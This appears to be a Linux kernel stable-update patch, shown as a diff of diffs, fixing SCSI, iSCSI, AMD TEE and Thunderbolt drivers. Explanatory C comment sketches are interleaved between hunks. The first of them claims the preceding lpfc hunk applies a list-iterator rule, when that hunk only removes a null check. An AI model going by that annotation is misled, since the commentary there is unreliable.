+ 	u32 rd_object_name[LPFC_MBX_OBJECT_NAME_LEN_DW] = {0};
+ 
+-	/* sanity check on queue memory */
+-	if (!datap)
+-		return -ENODEV;
+-
+ 	mbox = mempool_alloc(phba->mbox_mem_pool, GFP_KERNEL);
+ 	if (!mbox)
+ 		return -ENOMEM;
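
/*
 * The lpfc hunk above applies the post-loop iterator rule: after
 * list_for_each_entry_safe() terminates (or breaks), the cursor no
 * longer points at a valid element, so the matched element is captured
 * in a separate pointer inside the loop. A minimal sketch with a
 * made-up element type:
 */
#include <linux/list.h>

struct ex_buf {
	struct list_head list;
};

static struct ex_buf *ex_pop_first(struct list_head *head)
{
	struct ex_buf *found = NULL, *iter, *tmp;

	list_for_each_entry_safe(iter, tmp, head, list) {
		list_del(&iter->list);
		found = iter;	/* only 'found' may be used after the loop */
		break;
	}

	return found;
}
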
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_app.c b/drivers/scsi/mpi3mr/mpi3mr_app.c
+index bff6377023979..d10c6afb7f9cd 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_app.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_app.c
+@@ -886,7 +886,7 @@ static int mpi3mr_build_nvme_prp(struct mpi3mr_ioc *mrioc,
+ 			 * each time through the loop.
+ 			 */
+ 			*prp_entry = cpu_to_le64(dma_addr);
+-			if (*prp1_entry & sgemod_mask) {
++			if (*prp_entry & sgemod_mask) {
+ 				dprint_bsg_err(mrioc,
+ 				    "%s: PRP address collides with SGE modifier\n",
+ 				    __func__);
+@@ -895,7 +895,7 @@ static int mpi3mr_build_nvme_prp(struct mpi3mr_ioc *mrioc,
+ 			*prp_entry &= ~sgemod_mask;
+ 			*prp_entry |= sgemod_val;
+ 			prp_entry++;
+-			prp_entry_dma++;
++			prp_entry_dma += prp_size;
+ 		}
+ 
+ 		/*
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_fw.c b/drivers/scsi/mpi3mr/mpi3mr_fw.c
+index 74fa7f90399e3..ea9e69fb62826 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_fw.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_fw.c
+@@ -1198,7 +1198,7 @@ mpi3mr_revalidate_factsdata(struct mpi3mr_ioc *mrioc)
+  */
+ static int mpi3mr_bring_ioc_ready(struct mpi3mr_ioc *mrioc)
+ {
+-	u32 ioc_config, ioc_status, timeout;
++	u32 ioc_config, ioc_status, timeout, host_diagnostic;
+ 	int retval = 0;
+ 	enum mpi3mr_iocstate ioc_state;
+ 	u64 base_info;
+@@ -1252,6 +1252,23 @@ static int mpi3mr_bring_ioc_ready(struct mpi3mr_ioc *mrioc)
+ 			    retval, mpi3mr_iocstate_name(ioc_state));
+ 	}
+ 	if (ioc_state != MRIOC_STATE_RESET) {
++		if (ioc_state == MRIOC_STATE_FAULT) {
++			timeout = MPI3_SYSIF_DIAG_SAVE_TIMEOUT * 10;
++			mpi3mr_print_fault_info(mrioc);
++			do {
++				host_diagnostic =
++					readl(&mrioc->sysif_regs->host_diagnostic);
++				if (!(host_diagnostic &
++				      MPI3_SYSIF_HOST_DIAG_SAVE_IN_PROGRESS))
++					break;
++				if (!pci_device_is_present(mrioc->pdev)) {
++					mrioc->unrecoverable = 1;
++					ioc_err(mrioc, "controller is not present at the bringup\n");
++					goto out_device_not_present;
++				}
++				msleep(100);
++			} while (--timeout);
++		}
+ 		mpi3mr_print_fault_info(mrioc);
+ 		ioc_info(mrioc, "issuing soft reset to bring to reset state\n");
+ 		retval = mpi3mr_issue_reset(mrioc,
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_transport.c b/drivers/scsi/mpi3mr/mpi3mr_transport.c
+index 50263ba4f8428..5748bd9369ff7 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_transport.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_transport.c
+@@ -1549,7 +1549,8 @@ static void mpi3mr_sas_port_remove(struct mpi3mr_ioc *mrioc, u64 sas_address,
+ 
+ 	list_for_each_entry_safe(mr_sas_phy, next_phy,
+ 	    &mr_sas_port->phy_list, port_siblings) {
+-		if ((mrioc->logging_level & MPI3_DEBUG_TRANSPORT_INFO))
++		if ((!mrioc->stop_drv_processing) &&
++		    (mrioc->logging_level & MPI3_DEBUG_TRANSPORT_INFO))
+ 			dev_info(&mr_sas_port->port->dev,
+ 			    "remove: sas_address(0x%016llx), phy(%d)\n",
+ 			    (unsigned long long)
+@@ -2354,15 +2355,16 @@ int mpi3mr_report_tgtdev_to_sas_transport(struct mpi3mr_ioc *mrioc,
+ 	tgtdev->host_exposed = 1;
+ 	if (!mpi3mr_sas_port_add(mrioc, tgtdev->dev_handle,
+ 	    sas_address_parent, hba_port)) {
+-		tgtdev->host_exposed = 0;
+ 		retval = -1;
+-	} else if ((!tgtdev->starget)) {
+-		if (!mrioc->is_driver_loading)
++		} else if ((!tgtdev->starget) && (!mrioc->is_driver_loading)) {
+ 			mpi3mr_sas_port_remove(mrioc, sas_address,
+ 			    sas_address_parent, hba_port);
+-		tgtdev->host_exposed = 0;
+ 		retval = -1;
+ 	}
++	if (retval) {
++		tgtdev->dev_spec.sas_sata_inf.hba_port = NULL;
++		tgtdev->host_exposed = 0;
++	}
+ 	return retval;
+ }
+ 
+@@ -2391,6 +2393,7 @@ void mpi3mr_remove_tgtdev_from_sas_transport(struct mpi3mr_ioc *mrioc,
+ 	mpi3mr_sas_port_remove(mrioc, sas_address, sas_address_parent,
+ 	    hba_port);
+ 	tgtdev->host_exposed = 0;
++	tgtdev->dev_spec.sas_sata_inf.hba_port = NULL;
+ }
+ 
+ /**
+@@ -2447,7 +2450,7 @@ static u8 mpi3mr_get_port_id_by_rphy(struct mpi3mr_ioc *mrioc, struct sas_rphy *
+ 
+ 		tgtdev = __mpi3mr_get_tgtdev_by_addr_and_rphy(mrioc,
+ 			    rphy->identify.sas_address, rphy);
+-		if (tgtdev) {
++		if (tgtdev && tgtdev->dev_spec.sas_sata_inf.hba_port) {
+ 			port_id =
+ 				tgtdev->dev_spec.sas_sata_inf.hba_port->port_id;
+ 			mpi3mr_tgtdev_put(tgtdev);
+diff --git a/drivers/scsi/qla2xxx/qla_gbl.h b/drivers/scsi/qla2xxx/qla_gbl.h
+index e3256e721be14..ee54207fc5319 100644
+--- a/drivers/scsi/qla2xxx/qla_gbl.h
++++ b/drivers/scsi/qla2xxx/qla_gbl.h
+@@ -192,6 +192,7 @@ extern int ql2xsecenable;
+ extern int ql2xenforce_iocb_limit;
+ extern int ql2xabts_wait_nvme;
+ extern u32 ql2xnvme_queues;
++extern int ql2xfc2target;
+ 
+ extern int qla2x00_loop_reset(scsi_qla_host_t *);
+ extern void qla2x00_abort_all_cmds(scsi_qla_host_t *, int);
+diff --git a/drivers/scsi/qla2xxx/qla_init.c b/drivers/scsi/qla2xxx/qla_init.c
+index a8d822c4e3bac..93f7f3dd5d82b 100644
+--- a/drivers/scsi/qla2xxx/qla_init.c
++++ b/drivers/scsi/qla2xxx/qla_init.c
+@@ -1841,7 +1841,8 @@ void qla2x00_handle_rscn(scsi_qla_host_t *vha, struct event_arg *ea)
+ 	case RSCN_PORT_ADDR:
+ 		fcport = qla2x00_find_fcport_by_nportid(vha, &ea->id, 1);
+ 		if (fcport) {
+-			if (fcport->flags & FCF_FCP2_DEVICE &&
++			if (ql2xfc2target &&
++			    fcport->flags & FCF_FCP2_DEVICE &&
+ 			    atomic_read(&fcport->state) == FCS_ONLINE) {
+ 				ql_dbg(ql_dbg_disc, vha, 0x2115,
+ 				       "Delaying session delete for FCP2 portid=%06x %8phC ",
+diff --git a/drivers/scsi/qla2xxx/qla_isr.c b/drivers/scsi/qla2xxx/qla_isr.c
+index cbbd7014da939..86928a762a7a6 100644
+--- a/drivers/scsi/qla2xxx/qla_isr.c
++++ b/drivers/scsi/qla2xxx/qla_isr.c
+@@ -1900,6 +1900,8 @@ qla2x00_get_sp_from_handle(scsi_qla_host_t *vha, const char *func,
+ 	}
+ 
+ 	req->outstanding_cmds[index] = NULL;
++
++	qla_put_fw_resources(sp->qpair, &sp->iores);
+ 	return sp;
+ }
+ 
+@@ -3112,7 +3114,6 @@ qla25xx_process_bidir_status_iocb(scsi_qla_host_t *vha, void *pkt,
+ 	}
+ 	bsg_reply->reply_payload_rcv_len = 0;
+ 
+-	qla_put_fw_resources(sp->qpair, &sp->iores);
+ done:
+ 	/* Return the vendor specific reply to API */
+ 	bsg_reply->reply_data.vendor_reply.vendor_rsp[0] = rval;
+diff --git a/drivers/scsi/qla2xxx/qla_os.c b/drivers/scsi/qla2xxx/qla_os.c
+index 6e33dc16ce6f3..7d2d872bae3c5 100644
+--- a/drivers/scsi/qla2xxx/qla_os.c
++++ b/drivers/scsi/qla2xxx/qla_os.c
+@@ -360,6 +360,13 @@ MODULE_PARM_DESC(ql2xnvme_queues,
+ 	"1 - Minimum number of queues supported\n"
+ 	"8 - Default value");
+ 
++int ql2xfc2target = 1;
++module_param(ql2xfc2target, int, 0444);
++MODULE_PARM_DESC(ql2xfc2target,
++		  "Enables FC2 Target support. "
++		  "0 - FC2 Target support is disabled. "
++		  "1 - FC2 Target support is enabled (default).");
++
+ static struct scsi_transport_template *qla2xxx_transport_template = NULL;
+ struct scsi_transport_template *qla2xxx_transport_vport_template = NULL;
+ 
+@@ -1848,6 +1855,17 @@ __qla2x00_abort_all_cmds(struct qla_qpair *qp, int res)
+ 	for (cnt = 1; cnt < req->num_outstanding_cmds; cnt++) {
+ 		sp = req->outstanding_cmds[cnt];
+ 		if (sp) {
++			/*
++			 * perform lockless completion during driver unload
++			 */
++			if (qla2x00_chip_is_down(vha)) {
++				req->outstanding_cmds[cnt] = NULL;
++				spin_unlock_irqrestore(qp->qp_lock_ptr, flags);
++				sp->done(sp, res);
++				spin_lock_irqsave(qp->qp_lock_ptr, flags);
++				continue;
++			}
++
+ 			switch (sp->cmd_type) {
+ 			case TYPE_SRB:
+ 				qla2x00_abort_srb(qp, sp, res, &flags);
+@@ -4076,7 +4094,8 @@ qla2x00_mark_all_devices_lost(scsi_qla_host_t *vha)
+ 	    "Mark all dev lost\n");
+ 
+ 	list_for_each_entry(fcport, &vha->vp_fcports, list) {
+-		if (fcport->loop_id != FC_NO_LOOP_ID &&
++		if (ql2xfc2target &&
++		    fcport->loop_id != FC_NO_LOOP_ID &&
+ 		    (fcport->flags & FCF_FCP2_DEVICE) &&
+ 		    fcport->port_type == FCT_TARGET &&
+ 		    !qla2x00_reset_active(vha)) {
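
/*
 * For reference, the module-parameter boilerplate used above requires
 * the same symbol name in the variable, module_param() and
 * MODULE_PARM_DESC(). A minimal, self-contained sketch with an
 * invented parameter:
 */
#include <linux/module.h>
#include <linux/moduleparam.h>

static int ex_enable_feature = 1;
module_param(ex_enable_feature, int, 0444);
MODULE_PARM_DESC(ex_enable_feature,
		 "0 - feature disabled. 1 - feature enabled (default).");
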
+diff --git a/drivers/scsi/scsi_devinfo.c b/drivers/scsi/scsi_devinfo.c
+index bc9d280417f6a..3fcaf10a9dfe7 100644
+--- a/drivers/scsi/scsi_devinfo.c
++++ b/drivers/scsi/scsi_devinfo.c
+@@ -234,6 +234,7 @@ static struct {
+ 	{"SGI", "RAID5", "*", BLIST_SPARSELUN},
+ 	{"SGI", "TP9100", "*", BLIST_REPORTLUN2},
+ 	{"SGI", "Universal Xport", "*", BLIST_NO_ULD_ATTACH},
++	{"SKhynix", "H28U74301AMR", NULL, BLIST_SKIP_VPD_PAGES},
+ 	{"IBM", "Universal Xport", "*", BLIST_NO_ULD_ATTACH},
+ 	{"SUN", "Universal Xport", "*", BLIST_NO_ULD_ATTACH},
+ 	{"DELL", "Universal Xport", "*", BLIST_NO_ULD_ATTACH},
+diff --git a/drivers/scsi/storvsc_drv.c b/drivers/scsi/storvsc_drv.c
+index 55d6fb4526804..a0665bca54b99 100644
+--- a/drivers/scsi/storvsc_drv.c
++++ b/drivers/scsi/storvsc_drv.c
+@@ -987,6 +987,22 @@ static void storvsc_handle_error(struct vmscsi_request *vm_srb,
+ 				goto do_work;
+ 			}
+ 
++			/*
++			 * Check for "Operating parameters have changed"
++			 * due to Hyper-V changing the VHD/VHDX BlockSize
++			 * when adding/removing a differencing disk. This
++			 * causes discard_granularity to change, so do a
++			 * rescan to pick up the new granularity. We don't
++			 * want scsi_report_sense() to output a message
++			 * that a sysadmin wouldn't know what to do with.
++			 */
++			if ((asc == 0x3f) && (ascq != 0x03) &&
++					(ascq != 0x0e)) {
++				process_err_fn = storvsc_device_scan;
++				set_host_byte(scmnd, DID_REQUEUE);
++				goto do_work;
++			}
++
+ 			/*
+ 			 * Otherwise, let upper layer deal with the
+ 			 * error when sense message is present
+diff --git a/drivers/soc/qcom/llcc-qcom.c b/drivers/soc/qcom/llcc-qcom.c
+index 82c3cfdcc5601..9c6cf2f5d77ce 100644
+--- a/drivers/soc/qcom/llcc-qcom.c
++++ b/drivers/soc/qcom/llcc-qcom.c
+@@ -170,9 +170,9 @@ static const struct llcc_slice_config sc8280xp_data[] = {
+ 	{ LLCC_CVP,      28, 512,  3, 1, 0xfff, 0x0, 0, 0, 0, 1, 0, 0 },
+ 	{ LLCC_APTCM,    30, 1024, 3, 1, 0x0,   0x1, 1, 0, 0, 1, 0, 0 },
+ 	{ LLCC_WRCACHE,  31, 1024, 1, 1, 0xfff, 0x0, 0, 0, 0, 0, 1, 0 },
+-	{ LLCC_CVPFW,    32, 512,  1, 0, 0xfff, 0x0, 0, 0, 0, 1, 0, 0 },
+-	{ LLCC_CPUSS1,   33, 2048, 1, 1, 0xfff, 0x0, 0, 0, 0, 1, 0, 0 },
+-	{ LLCC_CPUHWT,   36, 512,  1, 1, 0xfff, 0x0, 0, 0, 0, 0, 1, 0 },
++	{ LLCC_CVPFW,    17, 512,  1, 0, 0xfff, 0x0, 0, 0, 0, 1, 0, 0 },
++	{ LLCC_CPUSS1,   3, 2048, 1, 1, 0xfff, 0x0, 0, 0, 0, 1, 0, 0 },
++	{ LLCC_CPUHWT,   5, 512,  1, 1, 0xfff, 0x0, 0, 0, 0, 0, 1, 0 },
+ };
+ 
+ static const struct llcc_slice_config sdm845_data[] =  {
+diff --git a/drivers/target/iscsi/iscsi_target_parameters.c b/drivers/target/iscsi/iscsi_target_parameters.c
+index 2317fb077db0e..557516c642c3b 100644
+--- a/drivers/target/iscsi/iscsi_target_parameters.c
++++ b/drivers/target/iscsi/iscsi_target_parameters.c
+@@ -1262,18 +1262,20 @@ static struct iscsi_param *iscsi_check_key(
+ 		return param;
+ 
+ 	if (!(param->phase & phase)) {
+-		pr_err("Key \"%s\" may not be negotiated during ",
+-				param->name);
++		char *phase_name;
++
+ 		switch (phase) {
+ 		case PHASE_SECURITY:
+-			pr_debug("Security phase.\n");
++			phase_name = "Security";
+ 			break;
+ 		case PHASE_OPERATIONAL:
+-			pr_debug("Operational phase.\n");
++			phase_name = "Operational";
+ 			break;
+ 		default:
+-			pr_debug("Unknown phase.\n");
++			phase_name = "Unknown";
+ 		}
++		pr_err("Key \"%s\" may not be negotiated during %s phase.\n",
++				param->name, phase_name);
+ 		return NULL;
+ 	}
+ 
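
/*
 * Distilled form of the logging change above: resolve the enum to a
 * name first, then emit one complete pr_err() instead of splitting the
 * message across pr_err() and pr_debug(), which print at different log
 * levels and can interleave. Enum and helper names are illustrative.
 */
#include <linux/printk.h>

enum ex_phase { EX_PHASE_SECURITY, EX_PHASE_OPERATIONAL };

static const char *ex_phase_name(int phase)
{
	switch (phase) {
	case EX_PHASE_SECURITY:
		return "Security";
	case EX_PHASE_OPERATIONAL:
		return "Operational";
	default:
		return "Unknown";
	}
}

static void ex_reject_key(const char *key, int phase)
{
	pr_err("Key \"%s\" may not be negotiated during %s phase.\n",
	       key, ex_phase_name(phase));
}
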
+diff --git a/drivers/tee/amdtee/core.c b/drivers/tee/amdtee/core.c
+index 297dc62bca298..372d64756ed64 100644
+--- a/drivers/tee/amdtee/core.c
++++ b/drivers/tee/amdtee/core.c
+@@ -267,35 +267,34 @@ int amdtee_open_session(struct tee_context *ctx,
+ 		goto out;
+ 	}
+ 
++	/* Open session with loaded TA */
++	handle_open_session(arg, &session_info, param);
++	if (arg->ret != TEEC_SUCCESS) {
++		pr_err("open_session failed %d\n", arg->ret);
++		handle_unload_ta(ta_handle);
++		kref_put(&sess->refcount, destroy_session);
++		goto out;
++	}
++
+ 	/* Find an empty session index for the given TA */
+ 	spin_lock(&sess->lock);
+ 	i = find_first_zero_bit(sess->sess_mask, TEE_NUM_SESSIONS);
+-	if (i < TEE_NUM_SESSIONS)
++	if (i < TEE_NUM_SESSIONS) {
++		sess->session_info[i] = session_info;
++		set_session_id(ta_handle, i, &arg->session);
+ 		set_bit(i, sess->sess_mask);
++	}
+ 	spin_unlock(&sess->lock);
+ 
+ 	if (i >= TEE_NUM_SESSIONS) {
+ 		pr_err("reached maximum session count %d\n", TEE_NUM_SESSIONS);
++		handle_close_session(ta_handle, session_info);
+ 		handle_unload_ta(ta_handle);
+ 		kref_put(&sess->refcount, destroy_session);
+ 		rc = -ENOMEM;
+ 		goto out;
+ 	}
+ 
+-	/* Open session with loaded TA */
+-	handle_open_session(arg, &session_info, param);
+-	if (arg->ret != TEEC_SUCCESS) {
+-		pr_err("open_session failed %d\n", arg->ret);
+-		spin_lock(&sess->lock);
+-		clear_bit(i, sess->sess_mask);
+-		spin_unlock(&sess->lock);
+-		handle_unload_ta(ta_handle);
+-		kref_put(&sess->refcount, destroy_session);
+-		goto out;
+-	}
+-
+-	sess->session_info[i] = session_info;
+-	set_session_id(ta_handle, i, &arg->session);
+ out:
+ 	free_pages((u64)ta, get_order(ta_size));
+ 	return rc;
+diff --git a/drivers/thunderbolt/debugfs.c b/drivers/thunderbolt/debugfs.c
+index 834bcad42e9fe..d89f92032c1c2 100644
+--- a/drivers/thunderbolt/debugfs.c
++++ b/drivers/thunderbolt/debugfs.c
+@@ -942,7 +942,8 @@ static void margining_port_remove(struct tb_port *port)
+ 
+ 	snprintf(dir_name, sizeof(dir_name), "port%d", port->port);
+ 	parent = debugfs_lookup(dir_name, port->sw->debugfs_dir);
+-	debugfs_remove_recursive(debugfs_lookup("margining", parent));
++	if (parent)
++		debugfs_remove_recursive(debugfs_lookup("margining", parent));
+ 
+ 	kfree(port->usb4->margining);
+ 	port->usb4->margining = NULL;
+@@ -967,19 +968,18 @@ static void margining_switch_init(struct tb_switch *sw)
+ 
+ static void margining_switch_remove(struct tb_switch *sw)
+ {
++	struct tb_port *upstream, *downstream;
+ 	struct tb_switch *parent_sw;
+-	struct tb_port *downstream;
+ 	u64 route = tb_route(sw);
+ 
+ 	if (!route)
+ 		return;
+ 
+-	/*
+-	 * Upstream is removed with the router itself but we need to
+-	 * remove the downstream port margining directory.
+-	 */
++	upstream = tb_upstream_port(sw);
+ 	parent_sw = tb_switch_parent(sw);
+ 	downstream = tb_port_at(route, parent_sw);
++
++	margining_port_remove(upstream);
+ 	margining_port_remove(downstream);
+ }
+ 
+diff --git a/drivers/thunderbolt/nhi.c b/drivers/thunderbolt/nhi.c
+index 4dce2edd86ea0..cfebec107f3fc 100644
+--- a/drivers/thunderbolt/nhi.c
++++ b/drivers/thunderbolt/nhi.c
+@@ -46,7 +46,7 @@
+ #define QUIRK_AUTO_CLEAR_INT	BIT(0)
+ #define QUIRK_E2E		BIT(1)
+ 
+-static int ring_interrupt_index(struct tb_ring *ring)
++static int ring_interrupt_index(const struct tb_ring *ring)
+ {
+ 	int bit = ring->hop;
+ 	if (!ring->is_tx)
+@@ -63,13 +63,14 @@ static void ring_interrupt_active(struct tb_ring *ring, bool active)
+ {
+ 	int reg = REG_RING_INTERRUPT_BASE +
+ 		  ring_interrupt_index(ring) / 32 * 4;
+-	int bit = ring_interrupt_index(ring) & 31;
+-	int mask = 1 << bit;
++	int interrupt_bit = ring_interrupt_index(ring) & 31;
++	int mask = 1 << interrupt_bit;
+ 	u32 old, new;
+ 
+ 	if (ring->irq > 0) {
+ 		u32 step, shift, ivr, misc;
+ 		void __iomem *ivr_base;
++		int auto_clear_bit;
+ 		int index;
+ 
+ 		if (ring->is_tx)
+@@ -77,18 +78,25 @@ static void ring_interrupt_active(struct tb_ring *ring, bool active)
+ 		else
+ 			index = ring->hop + ring->nhi->hop_count;
+ 
+-		if (ring->nhi->quirks & QUIRK_AUTO_CLEAR_INT) {
+-			/*
+-			 * Ask the hardware to clear interrupt status
+-			 * bits automatically since we already know
+-			 * which interrupt was triggered.
+-			 */
+-			misc = ioread32(ring->nhi->iobase + REG_DMA_MISC);
+-			if (!(misc & REG_DMA_MISC_INT_AUTO_CLEAR)) {
+-				misc |= REG_DMA_MISC_INT_AUTO_CLEAR;
+-				iowrite32(misc, ring->nhi->iobase + REG_DMA_MISC);
+-			}
+-		}
++		/*
++		 * Intel routers support a bit that isn't part of
++		 * the USB4 spec to ask the hardware to clear
++		 * interrupt status bits automatically since
++		 * we already know which interrupt was triggered.
++		 *
++		 * Other routers explicitly disable auto-clear
++		 * to prevent conditions that may occur where two
++		 * MSIX interrupts are simultaneously active and
++		 * reading the register clears both of them.
++		 */
++		misc = ioread32(ring->nhi->iobase + REG_DMA_MISC);
++		if (ring->nhi->quirks & QUIRK_AUTO_CLEAR_INT)
++			auto_clear_bit = REG_DMA_MISC_INT_AUTO_CLEAR;
++		else
++			auto_clear_bit = REG_DMA_MISC_DISABLE_AUTO_CLEAR;
++		if (!(misc & auto_clear_bit))
++			iowrite32(misc | auto_clear_bit,
++				  ring->nhi->iobase + REG_DMA_MISC);
+ 
+ 		ivr_base = ring->nhi->iobase + REG_INT_VEC_ALLOC_BASE;
+ 		step = index / REG_INT_VEC_ALLOC_REGS * REG_INT_VEC_ALLOC_BITS;
+@@ -108,7 +116,7 @@ static void ring_interrupt_active(struct tb_ring *ring, bool active)
+ 
+ 	dev_dbg(&ring->nhi->pdev->dev,
+ 		"%s interrupt at register %#x bit %d (%#x -> %#x)\n",
+-		active ? "enabling" : "disabling", reg, bit, old, new);
++		active ? "enabling" : "disabling", reg, interrupt_bit, old, new);
+ 
+ 	if (new == old)
+ 		dev_WARN(&ring->nhi->pdev->dev,
+@@ -393,14 +401,17 @@ EXPORT_SYMBOL_GPL(tb_ring_poll_complete);
+ 
+ static void ring_clear_msix(const struct tb_ring *ring)
+ {
++	int bit;
++
+ 	if (ring->nhi->quirks & QUIRK_AUTO_CLEAR_INT)
+ 		return;
+ 
++	bit = ring_interrupt_index(ring) & 31;
+ 	if (ring->is_tx)
+-		ioread32(ring->nhi->iobase + REG_RING_NOTIFY_BASE);
++		iowrite32(BIT(bit), ring->nhi->iobase + REG_RING_INT_CLEAR);
+ 	else
+-		ioread32(ring->nhi->iobase + REG_RING_NOTIFY_BASE +
+-			 4 * (ring->nhi->hop_count / 32));
++		iowrite32(BIT(bit), ring->nhi->iobase + REG_RING_INT_CLEAR +
++			  4 * (ring->nhi->hop_count / 32));
+ }
+ 
+ static irqreturn_t ring_msix(int irq, void *data)
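
/*
 * The MSIX change above moves from read-to-clear (one read wipes a
 * whole status word and can swallow another vector's event) to
 * write-one-to-clear of just this ring's bit, mirroring the
 * REG_RING_INT_CLEAR layout added below. The helper name is invented.
 */
#include <linux/bits.h>
#include <linux/io.h>

#define EX_REG_RING_INT_CLEAR	0x37808

static void ex_ring_clear_irq(void __iomem *iobase, unsigned int index)
{
	iowrite32(BIT(index & 31),
		  iobase + EX_REG_RING_INT_CLEAR + 4 * (index / 32));
}
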
+diff --git a/drivers/thunderbolt/nhi_regs.h b/drivers/thunderbolt/nhi_regs.h
+index 0d4970dcef842..faef165a919cc 100644
+--- a/drivers/thunderbolt/nhi_regs.h
++++ b/drivers/thunderbolt/nhi_regs.h
+@@ -77,12 +77,13 @@ struct ring_desc {
+ 
+ /*
+  * three bitfields: tx, rx, rx overflow
+- * Every bitfield contains one bit for every hop (REG_HOP_COUNT). Registers are
+- * cleared on read. New interrupts are fired only after ALL registers have been
++ * Every bitfield contains one bit for every hop (REG_HOP_COUNT).
++ * New interrupts are fired only after ALL registers have been
+  * read (even those containing only disabled rings).
+  */
+ #define REG_RING_NOTIFY_BASE	0x37800
+ #define RING_NOTIFY_REG_COUNT(nhi) ((31 + 3 * nhi->hop_count) / 32)
++#define REG_RING_INT_CLEAR	0x37808
+ 
+ /*
+  * two bitfields: rx, tx
+@@ -105,6 +106,7 @@ struct ring_desc {
+ 
+ #define REG_DMA_MISC			0x39864
+ #define REG_DMA_MISC_INT_AUTO_CLEAR     BIT(2)
++#define REG_DMA_MISC_DISABLE_AUTO_CLEAR	BIT(17)
+ 
+ #define REG_INMAIL_DATA			0x39900
+ 
+diff --git a/drivers/thunderbolt/quirks.c b/drivers/thunderbolt/quirks.c
+index b5f2ec79c4d6e..ae28a03fa890b 100644
+--- a/drivers/thunderbolt/quirks.c
++++ b/drivers/thunderbolt/quirks.c
+@@ -20,6 +20,12 @@ static void quirk_dp_credit_allocation(struct tb_switch *sw)
+ 	}
+ }
+ 
++static void quirk_clx_disable(struct tb_switch *sw)
++{
++	sw->quirks |= QUIRK_NO_CLX;
++	tb_sw_dbg(sw, "disabling CL states\n");
++}
++
+ struct tb_quirk {
+ 	u16 hw_vendor_id;
+ 	u16 hw_device_id;
+@@ -37,6 +43,13 @@ static const struct tb_quirk tb_quirks[] = {
+ 	 * DP buffers.
+ 	 */
+ 	{ 0x8087, 0x0b26, 0x0000, 0x0000, quirk_dp_credit_allocation },
++	/*
++	 * CLx is not supported on AMD USB4 Yellow Carp and Pink Sardine platforms.
++	 */
++	{ 0x0438, 0x0208, 0x0000, 0x0000, quirk_clx_disable },
++	{ 0x0438, 0x0209, 0x0000, 0x0000, quirk_clx_disable },
++	{ 0x0438, 0x020a, 0x0000, 0x0000, quirk_clx_disable },
++	{ 0x0438, 0x020b, 0x0000, 0x0000, quirk_clx_disable },
+ };
+ 
+ /**
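
/*
 * Tables like tb_quirks[] above are typically applied by a matcher
 * that treats zero IDs as wildcards and invokes the hook for each hit.
 * A generic sketch (structure and field names invented, not the
 * driver's own):
 */
#include <linux/types.h>

struct ex_quirk {
	u16 vendor;	/* 0 matches any vendor */
	u16 device;	/* 0 matches any device */
	void (*hook)(void *ctx);
};

static void ex_apply_quirks(void *ctx, u16 vendor, u16 device,
			    const struct ex_quirk *table, unsigned int n)
{
	unsigned int i;

	for (i = 0; i < n; i++) {
		const struct ex_quirk *q = &table[i];

		if (q->vendor && q->vendor != vendor)
			continue;
		if (q->device && q->device != device)
			continue;
		q->hook(ctx);
	}
}
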
+diff --git a/drivers/thunderbolt/retimer.c b/drivers/thunderbolt/retimer.c
+index 56008eb91e2e4..9cc28197dbc45 100644
+--- a/drivers/thunderbolt/retimer.c
++++ b/drivers/thunderbolt/retimer.c
+@@ -187,6 +187,22 @@ static ssize_t nvm_authenticate_show(struct device *dev,
+ 	return ret;
+ }
+ 
++static void tb_retimer_set_inbound_sbtx(struct tb_port *port)
++{
++	int i;
++
++	for (i = 1; i <= TB_MAX_RETIMER_INDEX; i++)
++		usb4_port_retimer_set_inbound_sbtx(port, i);
++}
++
++static void tb_retimer_unset_inbound_sbtx(struct tb_port *port)
++{
++	int i;
++
++	for (i = TB_MAX_RETIMER_INDEX; i >= 1; i--)
++		usb4_port_retimer_unset_inbound_sbtx(port, i);
++}
++
+ static ssize_t nvm_authenticate_store(struct device *dev,
+ 	struct device_attribute *attr, const char *buf, size_t count)
+ {
+@@ -213,6 +229,7 @@ static ssize_t nvm_authenticate_store(struct device *dev,
+ 	rt->auth_status = 0;
+ 
+ 	if (val) {
++		tb_retimer_set_inbound_sbtx(rt->port);
+ 		if (val == AUTHENTICATE_ONLY) {
+ 			ret = tb_retimer_nvm_authenticate(rt, true);
+ 		} else {
+@@ -232,6 +249,7 @@ static ssize_t nvm_authenticate_store(struct device *dev,
+ 	}
+ 
+ exit_unlock:
++	tb_retimer_unset_inbound_sbtx(rt->port);
+ 	mutex_unlock(&rt->tb->lock);
+ exit_rpm:
+ 	pm_runtime_mark_last_busy(&rt->dev);
+@@ -440,8 +458,7 @@ int tb_retimer_scan(struct tb_port *port, bool add)
+ 	 * Enable sideband channel for each retimer. We can do this
+ 	 * regardless whether there is device connected or not.
+ 	 */
+-	for (i = 1; i <= TB_MAX_RETIMER_INDEX; i++)
+-		usb4_port_retimer_set_inbound_sbtx(port, i);
++	tb_retimer_set_inbound_sbtx(port);
+ 
+ 	/*
+ 	 * Before doing anything else, read the authentication status.
+@@ -464,6 +481,8 @@ int tb_retimer_scan(struct tb_port *port, bool add)
+ 			break;
+ 	}
+ 
++	tb_retimer_unset_inbound_sbtx(port);
++
+ 	if (!last_idx)
+ 		return 0;
+ 
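
The net effect of the two hunks above is that sideband access is now strictly bracketed: enabled for every index before NVM work, disabled again in reverse order afterwards. A hedged usage sketch (do_nvm_access() is a hypothetical stand-in for the real NVM operations):

static int example_retimer_nvm_op(struct tb_port *port)
{
	int ret;

	tb_retimer_set_inbound_sbtx(port);	/* enable indices 1..TB_MAX_RETIMER_INDEX */
	ret = do_nvm_access(port);		/* hypothetical NVM read/write */
	tb_retimer_unset_inbound_sbtx(port);	/* disable in reverse order */

	return ret;
}
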
+diff --git a/drivers/thunderbolt/sb_regs.h b/drivers/thunderbolt/sb_regs.h
+index 5185cf3e4d978..f37a4320f10a5 100644
+--- a/drivers/thunderbolt/sb_regs.h
++++ b/drivers/thunderbolt/sb_regs.h
+@@ -20,6 +20,7 @@ enum usb4_sb_opcode {
+ 	USB4_SB_OPCODE_ROUTER_OFFLINE = 0x4e45534c,		/* "LSEN" */
+ 	USB4_SB_OPCODE_ENUMERATE_RETIMERS = 0x4d554e45,		/* "ENUM" */
+ 	USB4_SB_OPCODE_SET_INBOUND_SBTX = 0x5055534c,		/* "LSUP" */
